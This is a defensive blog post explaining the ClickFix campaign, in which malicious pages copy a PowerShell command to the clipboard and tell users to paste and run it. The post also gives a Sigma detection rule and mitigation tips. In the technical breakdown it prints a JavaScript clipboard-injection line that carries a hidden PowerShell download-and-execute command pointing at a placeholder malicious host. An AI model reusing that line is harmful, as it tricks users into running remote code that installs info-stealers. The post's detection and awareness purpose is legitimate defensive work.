top of page
Search

Dissecting the ClickFix Campaign: Clipboard Injection and Fileless PowerShell Exploits Explained

  • Writer: Akshay Jain
    Akshay Jain
  • Jul 15
  • 3 min read

In an age where antivirus products and endpoint detection platforms have evolved to flag obvious malicious files, attackers are shifting their game to stay stealthy. Enter ClickFix, a sophisticated clipboard injection campaign that doesn’t rely on traditional executables or droppers.

Instead, it weaponizes PowerShell, lives in memory, abuses user trust, and leverages clipboard manipulation to deploy malware, often with zero files written to disk.


In this blog, we walk through the ClickFix campaign, breaking down:

  • The technical workflow of the attack

  • How clipboard injection works

  • The PowerShell command chain used for fileless execution

  • Real world indicators of compromise

  • Sample detection rules and blue team workflows


What is the ClickFix Campaign?

First observed in early 2024, ClickFix refers to a cluster of clipboard hijacking attacks distributed via malicious websites posing as:

  • Software cracks

  • "Fix" tools for system errors

  • Pirated downloads

When the user lands on a compromised or malicious website, JavaScript is executed to copy malicious PowerShell commands directly into the clipboard.

Clickfix Campaign
Clickfix Campaign

The trap?

The site instructs the user to "Run the copied command in PowerShell to fix your issue."

Once executed, the command downloads and runs the payload in-memory, making detection much harder for legacy antivirus tools.


Technical Breakdown: Clipboard Injection and Fileless Execution


Step 1: Clipboard Injection via JavaScript

When a user visits a malicious ClickFix page, this code runs:

navigator.clipboard.writeText("powershell -w hidden -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')\"");

This line silently replaces the user's clipboard content with a base PowerShell downloader.


Step 2: User-Triggered Execution

The user is tricked into:

  • Opening PowerShell as Administrator

  • Pressing Ctrl + V

  • Hitting Enter

Boom!! the payload is fetched and executed filelessly in memory.


Step 3: Payload Behavior

The downloaded payload.ps1 typically:

  • Establishes persistence via WMI or registry

  • Downloads additional modules (Info-stealers, RATs)

  • Uses Living Off the Land Binaries (LOLBins) for lateral movement


Why Fileless Attacks Like This Are Hard to Detect?

Traditional AV relies on:

  • File signatures

  • Heuristics on file behavior

  • Executable scanning


ClickFix bypasses all of them by:

  • Not writing anything to disk

  • Running completely in memory

  • Using trusted Windows components (like PowerShell and WebClient)

  • Leveraging user action for execution


Detection Use Cases for Blue Teams

Sample Sigma Rule (PowerShell Clipboard Hijack)
title: Suspicious PowerShell Command Execution
logsource:
  category: process_creation
detection:
  selection:
    Image: 'powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - '-nop'
      - '-w hidden'
  condition: selection
level: high
Sysmon Rule for Clipboard Changes (Indirect)

While clipboard events aren’t directly logged in Sysmon, analysts can monitor:

  • Execution of clip.exe

  • Process tree from browsers > clipboard interaction > PowerShell


Mitigation Recommendations

  • Block known bad domains via DNS filtering

  • Monitor outbound connections from PowerShell

  • Use security plugins that warn about clipboard modification

  • Avoid downloading "fix" tools from unknown sources

  • Never paste unverified PowerShell code


The Threat Is Real and It’s Already in Your Clipboard.

The ClickFix campaign is a prime example of how attackers exploit human behavior, system trust, and native OS tools to bypass traditional defenses.

SOC analysts must now monitor not just malware but malicious behaviors, especially fileless execution chains initiated by users themselves.

If your detection strategy doesn’t account for in-memory attacks and clipboard hijacks, you may already be exposed.


Happy cyber-exploration! 🚀🔒


Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!


-AJ




bottom of page